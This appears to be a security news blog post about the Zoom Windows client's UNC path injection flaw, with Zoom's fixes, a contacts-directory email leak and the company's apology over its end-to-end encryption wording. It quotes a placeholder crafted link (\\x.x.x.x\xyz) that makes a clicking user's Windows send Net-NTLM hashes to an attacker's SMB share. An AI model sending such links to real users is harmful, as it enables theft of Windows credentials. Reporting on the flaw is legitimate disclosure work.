Zoom Video Conferencing Software Vulnerable To Hackers

Zoom Vulnerable
Zoom Vulnerable
  • UNC Path Injection Vulnerability Found in Zoom
  • Hackers could steal your Windows Credentials 

If you are working from home and using Zoom video software for your official meetings then you might be a high risk. Cyber Security experts found critical vulnerability in Zoom Video Conferencing software that allows hackers to clicking on malicious link over web chat.

The Zoom client for Windows Vulnerable to the UNC Patch Injection vulnerability that could steal login credentials remotely.

How Vulnerability Works in Zoom as follow

According to security researcher @_godmode,

  1. Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
  2. Zoom protocol handler getting lots of eyes over the last few days I suspect …. zoommtg:// – “C:\Users\xxxxxxxx\AppData\Roaming\Zoom\bin\Zoom.exe” “–url=%1”
  3. To steal Windows login credentials of a targeted user, all an attacker needs to do is sent a crafted URL (i.e., \\x.x.x.x\abc_file) to a victim via a chat interface.

Once clicked, the attack would eventually allow the attacker-controlled SMB share to automatically capture authentication data from Windows, without the knowledge of the targeted user.

Google Security researcher Tavis Ormandy demonstrates.

Zoom Research
Zoom Research image by Tavis

Security researcher Mathhew Hickey from HackerFantastic has tested the UNC injection vulnerability in ZOOM

Zoom Vulnerability Demonstration

Zoom UNC Path injection/rendering leads to malicious executables execution demo, by security researcher Mohamed A. Baset

Zoom has fixed the vulnerability with following changes.

  • Removed the attendee attention tracker feature.
  • Released fixes for both Mac-related issues raised by Patrick Wardle.
  • Released a fix for the UNC link issue.
  • Removed the LinkedIn Sales Navigator after identifying unnecessary data disclosure by the feature.

Eric S. Yuan, Founder and CEO of Zoom said, “Transparency has always been a core part of our culture. I am committed to being open and honest with you about areas where we are strengthening our platform and areas where users can take steps of their own to best use and protect themselves on the platform.”

Zoom Leaks Users Email Id’s and Photos and allow strangers to start a video call with them through Zoom access.

According to Zoom support By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.

Zoom Applogise and Clarifies Encryption Content Across their Network.

“In light of recent interest in our encryption practices, we want to start by apologizing for the confusion we have caused by incorrectly suggesting that Zoom meetings were capable of using end-to-end encryption, Zoom said.

“Zoom has always strived to use encryption to protect content in as many scenarios as possible, and in that spirit, we used the term end-to-end encryption. While we never intended to deceive any of our customers, we recognize that there is a discrepancy between the commonly accepted definition of end-to-end encryption and how we were using it.”

“The goal of our encryption design is to provide the maximum amount of privacy possible while supporting the diverse needs of our client base. To be clear, in a meeting where all of the participants are using Zoom clients, and the meeting is not being recorded, we encrypt all video, audio, screen sharing, and chat content at the sending client, and do not decrypt it at any point before it reaches the receiving clients.”

“Zoom has never built a mechanism to decrypt live meetings for lawful intercept purposes, nor do we have means to insert our employees or others into meetings without being reflected in the participant list.”

“We are committed to doing the right thing by users when it comes to both security and privacy, and understand the enormity of this moment.”

Join Our Club

Enter your Email address to receive notifications | Join over Million Followers

Leave a Reply
Previous Article
Bug Bounty

Google Bug Bounty $3133 Writeup XSS Vulnerability

Next Article
Cyber Attacks On Website

3 Ways To Hide Your IP When Using MacBook or iPhone

Related Posts